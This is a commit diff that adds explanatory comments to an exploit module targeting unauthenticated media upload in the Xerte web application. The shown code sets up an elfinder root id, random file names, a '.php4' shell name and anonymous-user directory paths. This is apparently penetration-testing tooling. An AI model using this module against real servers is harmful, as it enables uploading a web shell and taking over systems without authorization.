Adds comments to clarify Xerte user directory scheme and elfinder root id

bootstrapbool · bootstrapbool · commit 6d7c49e52d2c · 2026-06-13T16:01:29.000-04:00
diff --git a/modules/exploits/multi/http/xerte_unauthenticated_mediaupload.rb b/modules/exploits/multi/http/xerte_unauthenticated_mediaupload.rb
@@ -179,13 +179,15 @@ def exploit
 
     vprint_status("Application Root: #{webroot}")
 
+    # The root dir id is always l1_Lw regardless of authentication scheme, user, or project
     root_dir_id = 'l1_Lw'
     dirname = Rex::Text.rand_text_alpha(8)
     filename = dirname + '.txt'
     shellname = dirname + '.php4'
 
-    if datastore['USERNAME'].nil?
-      user_dir = '--Nottingham/'
+    # The --Nottingham suffix is non configurable - it's used in all Xerte installations
+    if datastore['USERNAME'].nil? # Assumes Anonymous authentication enabled (Default Xerte configuration)
+      user_dir = '--Nottingham/'  # Anonymous authentication uses {project_id}--Nottingham scheme for all user directories
     else
       user_dir = "-#{datastore['USERNAME']}-Nottingham/"
     end
